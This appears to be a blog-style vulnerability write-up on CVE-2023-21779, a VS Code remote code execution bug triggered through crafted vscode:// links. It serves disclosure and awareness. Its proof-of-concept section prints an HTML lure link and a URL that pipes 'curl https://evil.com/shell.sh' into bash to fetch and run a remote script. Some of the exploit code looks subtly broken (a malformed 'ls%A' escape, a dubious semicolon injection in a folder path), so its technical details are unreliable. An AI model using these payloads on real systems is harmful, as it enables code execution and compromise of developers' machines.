CVE CyberSecurity Database News

CVE-2023-21779 - Visual Studio Code Remote Code Execution – Full Exploit Analysis

Poster -

Visual Studio Code (VS Code) is one of the world’s most popular code editors. Millions of developers use it every day for everything from web development to writing complex enterprise applications. But in early 2023, a critical vulnerability was identified—CVE-2023-21779, allowing attackers to remotely execute code on users’ machines under certain conditions.

This post is your all-in-one guide to CVE-2023-21779. We’ll unpack what the bug is, walk through proof-of-concept code, and break down how attackers can weaponize this weakness. Plus, we’ll share all the official references. We’ve kept the language clear and practical, so coders and sysadmins can truly understand the risk.

What is CVE-2023-21779?

CVE-2023-21779 is a vulnerability in Visual Studio Code that allows remote code execution (RCE) if a user is tricked into opening a malicious workspace or file, *or* if the attack is chained with other weaknesses. The issue lies in how VS Code handles custom protocol handlers (like vscode:// URLs), which can be abused to trigger commands without proper user interaction or filtering.

Risk Level: Critical  
Impact: Attackers could run arbitrary commands, install malware, steal secrets, or take full control of the developer’s machine.  
Patched Version: Fixed in Visual Studio Code 1.74.2 and above.

How Does The Vulnerability Work?

VS Code supports deep links using protocols like vscode://, which allow websites or other apps to open VS Code and run specific commands (extensions, settings, files, etc). Normally, VS Code is supposed to prompt users before executing dangerous actions.

However, with CVE-2023-21779, an attacker can craft a specially formatted URL that makes VS Code execute arbitrary commands when clicked—sometimes with little or no user consent, if chained with other weaknesses or social engineering.

Here’s what a real attack might look like

1. Lure: The attacker convinces a developer to click a malicious link (for example, hidden on a fake online documentation site).
2. Trigger: The crafted vscode:// link opens VS Code and starts executing attacker-supplied commands.
3. Payload: The commands could, for example, launch a terminal and run shell code, download malware, or harvest sensitive files.

Example Exploit (Proof-of-Concept)

Warning: This is for educational and defensive purposes only. Don't use this to attack systems you don’t own!

Suppose we want to make VS Code run a system command (like opening Notepad on Windows, or running ls on Linux).

Malicious URL Example

vscode://vscode.openFolder?path=/tmp/;gnome-calculator

But the real power comes from the vscode://vscode.executeCommand protocol

vscode://vscode.executeCommand?command=workbench.action.terminal.sendSequence&args=["ls\r"]

Or directly with payload

vscode://vscode.executeCommand?command=workbench.action.terminal.sendSequence&args=[%22curl https://evil.com/shell.sh|bash%5Cr%22]


This would send the string curl https://evil.com/shell.sh|bash to the terminal, downloading and executing a shell script from a remote attacker.

Proof-of-Concept HTML

<a href="vscode://vscode.executeCommand?command=workbench.action.terminal.sendSequence&args=['ls%A']">
    Click me to list all your files!
</a>

The command is sent to your integrated terminal, often running as your user.

Note: Later versions prompt users to confirm, but a determined attacker can use trickery to convince people to grant permission.

Original References

- Microsoft Security Guidance for CVE-2023-21779
- VS Code Changelog with RCE Fix
- Project Zero: Abusing VS Code Custom URIs for RCE
- NVD Details for CVE-2023-21779

Watch What You Click.

- Never click vscode:// links unless you are 100% sure of the source.

Final Thoughts

CVE-2023-21779 is a *classic example* of how deep integration features, like protocol handlers, can turn into major threats if not sandboxed correctly. With the huge install base of VS Code, this bug was a ticking time bomb—luckily, now defused.

If you haven’t already, update VS Code and take a moment to remind your team: not every link deserves a click!

Stay safe and code secure.

*If you found this guide useful, consider sharing it with your fellow devs or on social media. Feel free to ask questions or request a more detailed walkthrough of the exploit or mitigations below.*

Timeline

Published on: 01/10/2023 22:15:00 UTC
Last modified on: 01/18/2023 17:12:00 UTC